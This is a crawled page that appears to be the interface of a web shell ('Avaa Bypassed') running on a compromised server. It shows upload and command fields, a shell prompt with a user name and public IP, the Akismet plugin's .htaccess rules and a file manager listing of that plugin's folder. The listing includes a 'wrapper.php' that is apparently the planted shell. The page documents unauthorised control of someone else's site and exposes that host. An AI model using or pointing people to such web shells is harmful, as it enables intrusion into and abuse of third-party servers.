[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.116.88.123: ~ $
# Only allow direct access to specific Web-available files.

# Apache 2.2
<IfModule !mod_authz_core.c>
	Order Deny,Allow
	Deny from all
</IfModule>

# Apache 2.4
<IfModule mod_authz_core.c>
	Require all denied
</IfModule>

# Akismet CSS and JS
<FilesMatch "^(form\.js|akismet(-frontend|-admin)?\.js|akismet(-admin)?(-rtl)?\.css|inter\.css)$">
	<IfModule !mod_authz_core.c>
		Allow from all
	</IfModule>
	
	<IfModule mod_authz_core.c>
		Require all granted
	</IfModule>
</FilesMatch>

# Akismet images
<FilesMatch "^(logo-a-2x\.png|akismet-refresh-logo\.svg|akismet-refresh-logo@2x\.png|arrow-left\.svg|icon-external\.svg|akismet-activation-banner-elements\.png)$">
	<IfModule !mod_authz_core.c>
		Allow from all
	</IfModule>
	
	<IfModule mod_authz_core.c>
		Require all granted
	</IfModule>
</FilesMatch>

Filemanager

Name Type Size Permission Actions
_inc Folder 0755
views Folder 0755
.htaccess File 805 B 0644
LICENSE.txt File 17.67 KB 0644
akismet.php File 2.56 KB 0644
changelog.txt File 21.45 KB 0644
class.akismet-admin.php File 58.62 KB 0644
class.akismet-cli.php File 4.89 KB 0644
class.akismet-rest-api.php File 18.11 KB 0644
class.akismet-widget.php File 3.22 KB 0644
class.akismet.php File 73.25 KB 0644
index.php File 26 B 0644
readme.txt File 6.18 KB 0644
wrapper.php File 6.28 KB 0644